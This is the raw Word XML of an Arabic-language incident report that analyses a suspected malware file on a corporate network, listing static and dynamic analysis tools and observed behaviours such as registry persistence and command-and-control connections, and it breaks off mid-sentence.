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5C9213" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تحليل برمجية خبيثة تم رصدها في شبكة المؤسسة: دراسة تقنية وإجراءات الحماية </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C8A8A" w14:textId="149E0986" w:rsidR="00BD3CF0" w:rsidRPr="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="00BD3CF0">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3CF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">المقدمة </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133BAD59" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تم اكتشاف ملف قابل للتنفيذ يُشتبه في كونه برمجية خبيثة ضمن بيئة الشبكة المؤسسية، مما يشير إلى احتمال تعرّض الأنظمة والبيانات للخطر. يهدف هذا التقرير إلى فحص طبيعة هذا الملف، وتحليل سلوكه، وتصنيفه وفقًا لأنواع البرمجيات الضارة الشائعة. بالإضافة إلى ذلك، يتضمن التقرير مجموعة من التوصيات التي تهدف إلى تعزيز أمن الشبكة وتقليل المخاطر المرتبطة بهذا النوع من الهجمات الإلكترونية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375E14E" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">2. تحليل الملف المشبوه </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C517376" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 الأدوات المستخدمة في التحليل </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC72E97" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">تم اتباع نهجين رئيسيين لدراسة الملف باستخدام مجموعة من الأدوات المتخصصة: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13531D97" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>_ التحليل الساكن (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Static Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">): يركز على فحص هيكل الملف دون تشغيله، وذلك عبر الأدوات التالية: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2EF50" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لمقارنة الملف مع قاعدة بيانات تحتوي على توقيعات برمجيات خبيثة معروفة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3B883" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لاستخراج النصوص المخفية التي قد تحتوي على أوامر ضارة أو روابط مشبوهة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A5B5F" w14:textId="20E1923A" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>iD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لتحديد ما إذا كان الملف محميًا أو مشفرًا بأساليب معينة لإخفاء وظائفه الحقيقية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E026EC" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>IDA Pro / Ghidra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لتحليل الشيفرة التنفيذية للملف وتحديد أي تعليمات مريبة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06421CA8" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>_ التحليل الديناميكي (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Dynamic Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">): يتضمن تشغيل الملف في بيئة افتراضية آمنة لدراسة تفاعله مع النظام، باستخدام الأدوات التالية: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152023E" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Cuckoo Sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لمحاكاة تشغيل الملف ورصد سلوكه داخل النظام. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322CDA9E" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Process Monitor (ProcMon)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لمتابعة العمليات التي ينشئها الملف وتأثيره على النظام. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCBADEB" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">: لتحليل حركة البيانات التي يرسلها أو يستقبلها الملف عبر الشبكة. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC1E5D" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 المؤشرات الدالة على السلوك الضار </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85915A" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">أسفر التحليل الديناميكي عن مجموعة من السلوكيات غير الطبيعية، منها: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B26130C" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• إنشاء ملفات في مسارات حساسة داخل النظام، مما قد يشير إلى محاولة زرع برمجيات إضافية. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB575AC" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>• إجراء تعديلات على سجل النظام (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) لضمان التشغيل التلقائي عند بدء تشغيل الجهاز. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227017CF" w14:textId="77777777" w:rsidR="00BD3CF0" w:rsidRDefault="00BD3CF0" w:rsidP="001D0A4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">• إنشاء اتصالات خارجية عبر بروتوكولات </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>HTTP/HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl/>
        </w:rPr>
        <w:t>، وهو سلوك شائع في البرمجيات الخبيثة التي تتصل بخوادم التحكم والسيطرة (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
